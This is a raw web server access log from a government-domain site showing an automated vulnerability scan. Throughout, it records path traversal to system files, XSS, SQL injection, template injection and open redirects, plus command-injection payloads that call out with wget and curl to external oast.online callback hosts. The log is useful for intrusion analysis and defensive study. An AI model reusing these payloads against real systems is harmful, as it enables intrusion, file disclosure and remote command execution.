2023-10-13 15:53:55 103.153.214.94 GET /gespage/doDownloadData file_name=../../../../../Windows/debug/NetSetup.log 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 240
2023-10-13 15:54:24 103.153.214.94 POST /Config/SaveUploadedHotspotLogoFile - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 218
2023-10-13 15:54:27 103.153.214.94 GET /Assets/temp/hotspot/img/logohotspot.txt - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 223
2023-10-13 16:00:01 103.153.214.94 GET /security/hostSignon.do hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 210
2023-10-13 16:00:08 103.153.214.94 GET /ssoAdapter/logoutAction.do servProvCode=SAFVC&successURL=https://interact.sh/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 205
2023-10-13 16:03:04 103.153.214.94 GET /autodiscover/autodiscover.json @test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 219
2023-10-13 16:03:05 103.153.214.94 GET /autodiscover/autodiscover.json @test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 212
2023-10-13 16:06:03 103.153.214.94 POST / Command=NOOP&InternalFile=../../../../../../../../../../../../../../Windows/win.ini&NewWebClient=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 250
2023-10-13 16:06:09 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 242
2023-10-13 16:06:10 103.153.214.94 POST /wp-login.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 210
2023-10-13 16:06:13 103.153.214.94 GET /wp-admin/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 236
2023-10-13 16:06:36 103.153.214.94 GET /api/get_device_details - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 https://bcvt.kontum.gov.vn/assets/base/home.html 404 0 2 244
2023-10-13 16:07:06 103.153.214.94 GET /file valore=../../../../../windows/win.ini 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 235
2023-10-13 16:07:18 103.153.214.94 GET /page/hello/1"><svg/onload=alert(document.domain)> - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 222
2023-10-13 16:07:20 103.153.214.94 GET /page/1"><svg/onload=alert(document.domain)> - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 216
2023-10-13 16:08:01 103.153.214.94 GET /openam/oauth2/..;/ccversion/Version - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 234
2023-10-13 16:09:50 103.153.214.94 GET /thruk/cgi-bin/login.cgi thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 215
2023-10-13 16:12:56 103.153.214.94 GET /oam/server/opensso/sessionservice - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 248
2023-10-13 16:14:05 103.153.214.94 GET / action=command&command=set_city_timezone&value=$(wget%20http://ckjv7uic8b6p3donsoogkscwqiuha8gg5.oast.online)) 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 242
2023-10-13 16:14:48 103.153.214.94 PUT /SDK/webLanguage - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 207
2023-10-13 16:14:51 103.153.214.94 GET /x - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 230
2023-10-13 16:16:49 103.153.214.94 POST /ajaxPages/writeBrowseFilePathAjax.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 212
2023-10-13 16:16:51 103.153.214.94 GET /2WfF0V8E57lk8Kqz3Vgk87iLpSR.php cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//ckjv7uic8b6p3donsoogasdhntbbtb6in.oast.online+-H+'User-Agent%3a+qCc5ZR'")}' 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 231
2023-10-13 16:17:56 103.153.214.94 POST /cgi/networkDiag.cgi - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 208
2023-10-13 16:19:48 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 245
2023-10-13 16:20:01 103.153.214.94 GET /wfo/control/signin rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 243
2023-10-13 16:25:14 103.153.214.94 GET /webmail/basic/ referer=https://interact.sh&_c=auth&ctz=120&signup_password&_a%5bsignup%5d=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 239
2023-10-13 16:26:40 103.153.214.94 POST /druid/indexer/v1/sampler for=connect 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 240
2023-10-13 16:26:55 103.153.214.94 GET /module/ph_simpleblog/list sb_category=')%20OR%20true--%20- 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 249
2023-10-13 16:26:56 103.153.214.94 GET /module/ph_simpleblog/list sb_category=')%20AND%20false--%20- 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 208
2023-10-13 16:27:32 103.153.214.94 GET /http_header.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 206
2023-10-13 16:29:14 103.153.214.94 GET /jeecg-boot/actuator/httptrace/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 237
2023-10-13 16:29:26 103.153.214.94 GET /jeecg-boot/sys/user/querySysUser username=admin 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 212
2023-10-13 16:32:12 103.153.214.94 GET /LoadFrame frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 250
2023-10-13 16:33:10 103.153.214.94 GET /module/smartblog/archive month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 244
2023-10-13 16:34:40 103.153.214.94 GET /te<img+src=x+onerror=alert(42)>st - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 246
2023-10-13 16:35:10 103.153.214.94 GET /dashboardUser - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 207
2023-10-13 16:39:22 103.153.214.94 POST /controller/origemdb.php idselorigem=ATIVOS 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 232
2023-10-13 16:39:24 103.153.214.94 POST /controller/login.php acao=autenticar 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 247
2023-10-13 16:39:25 103.153.214.94 POST /controller/login.php acao=autenticar 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 204
2023-10-13 16:41:22 103.153.214.94 GET /vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 210
2023-10-13 16:41:25 103.153.214.94 GET /vendor/phpfastcache/phpfastcache/examples/phpinfo.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 248
2023-10-13 16:45:17 103.153.214.94 GET /visualizza_tabelle.php anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 210
2023-10-13 16:45:19 103.153.214.94 GET /storia_soldi.php piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 204
2023-10-13 16:45:22 103.153.214.94 GET /tabella.php jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 220
2023-10-13 16:45:24 103.153.214.94 GET /crea_modelli.php anno=2021&id_sessione&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 237
2023-10-13 16:45:49 103.153.214.94 GET /wp-admin/admin-ajax.php action=ea4747d9b63ed843a9f07ecaa2b7c327 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 248
2023-10-13 16:45:49 103.153.214.94 GET /wp-admin/admin-ajax.php action=a182056641ddda25c30deb6d82a9300b 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 204
2023-10-13 16:45:59 103.153.214.94 GET /login/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 206
2023-10-13 16:46:40 103.153.214.94 POST /wsman - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 206
2023-10-13 16:46:43 103.153.214.94 GET /tweb/ft.php u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 205
2023-10-13 16:47:32 103.153.214.94 GET /cliniccases/lib/php/data/messages_load.php type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 207
2023-10-13 16:49:11 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 405 0 1 213
2023-10-13 16:49:23 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 206
2023-10-13 16:52:11 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 219
2023-10-13 16:53:22 103.153.214.94 GET /.git/config - 443 - 44.202.31.218 python-requests/2.25.1 - 200 0 0 273
2023-10-13 16:53:22 103.153.214.94 GET /.git/config - 443 - 44.202.31.218 python-requests/2.25.1 - 200 0 0 280
2023-10-13 16:53:24 103.153.214.94 GET /.git/config - 443 - 44.202.31.218 python-requests/2.25.1 - 200 0 0 276
2023-10-13 16:53:29 103.153.214.94 GET /.git/config - 443 - 44.202.31.218 python-requests/2.25.1 - 200 0 0 280
2023-10-13 16:53:32 103.153.214.94 GET /.git/config - 443 - 44.202.31.218 python-requests/2.25.1 - 200 0 0 282
2023-10-13 16:53:34 103.153.214.94 GET /.git/config - 443 - 44.202.31.218 python-requests/2.25.1 - 200 0 0 277
2023-10-13 16:53:37 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 519
2023-10-13 16:54:06 103.153.214.94 GET /api/v1/components name=1&1%5B0%5D&1%5B1%5D=a&1%5B2%5D&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))-- 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 0 2 241
2023-10-13 16:54:59 103.153.214.94 GET /ajax/telemetry.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 227
2023-10-13 16:55:01 103.153.214.94 GET /glpi/ajax/telemetry.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 224
2023-10-13 16:55:03 103.153.214.94 GET /api/snapshots/:key - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 400 0 0 235
2023-10-13 16:55:43 103.153.214.94 POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 225
2023-10-13 17:03:33 103.153.214.94 GET / action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 246
2023-10-13 17:07:59 103.153.214.94 GET /wp-content/bps-backup/logs/db_backup_log.txt - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 237
2023-10-13 17:08:02 103.153.214.94 GET /wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 238
2023-10-13 17:08:34 103.153.214.94 GET /download/index.php file=../../../../../../../../../etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 238
2023-10-13 17:10:53 103.153.214.94 GET /index.php m=user&c=Users&a=logout&referurl=https://interact.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 240
2023-10-13 17:11:27 103.153.214.94 GET /self.key - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 206
2023-10-13 17:12:32 103.153.214.94 GET /conf/nginx.conf - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 206
2023-10-13 17:14:30 103.153.214.94 POST /cobbler_api - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 232
2023-10-13 17:14:51 103.153.214.94 GET / ... 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 15 0 207
2023-10-13 17:15:35 103.153.214.94 GET /Ajax_url_encode.php link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 243
2023-10-13 17:16:10 103.153.214.94 GET /IND780/excalweb.dll webpage=../../AutoCE.ini 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 208
2023-10-13 17:16:16 103.153.214.94 GET /tree action=get 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 203
2023-10-13 17:16:23 103.153.214.94 GET /about_state - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 208
2023-10-13 17:18:00 103.153.214.94 POST /RestAPI/LogonCustomization - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 207
2023-10-13 17:18:02 103.153.214.94 POST /RestAPI/LogonCustomization - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 209
2023-10-13 17:18:04 103.153.214.94 POST /RestAPI/Connection - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 203
2023-10-13 17:18:07 103.153.214.94 GET /help/admin-guide/test.jsp - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 241
2023-10-13 17:20:39 103.153.214.94 GET /login.html returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 246
2023-10-13 17:25:58 103.153.214.94 POST /v1/backend1 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 251
2023-10-13 17:26:02 103.153.214.94 GET /v1/2WfF0jqUHeQPNmTP3iIqGrjkdVa.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 251
2023-10-13 17:26:56 103.153.214.94 GET /files.md5 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 249
2023-10-13 17:26:59 103.153.214.94 GET /testrail/files.md5 - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 247
2023-10-13 17:27:31 103.153.214.94 POST /classes/Login.php f=login 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 250
2023-10-13 17:29:44 103.153.214.94 GET /GallerySite/filesrc/fotoilan/388/middle/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 11 0 259
2023-10-13 17:31:33 103.153.214.94 POST /install.php page=4 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 206
2023-10-13 17:31:33 103.153.214.94 POST /install.php page=4 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 205
2023-10-13 17:32:33 103.153.214.94 POST /install.php page=1 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 405 0 1 226
2023-10-13 17:34:08 103.153.214.94 POST /install.php page=4 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 216
2023-10-13 17:35:19 103.153.214.94 POST /install.php page=4 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 219
2023-10-13 17:35:58 103.153.214.94 POST /install.php page=4 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 240
2023-10-13 17:36:16 103.153.214.94 GET /dashboard/snapshot/{{constructor.constructor('alert(document.domain)')()}} orgId=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 622
2023-10-13 17:36:54 103.153.214.94 POST /api/v1/login/oauth2/auth - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 0 2 226
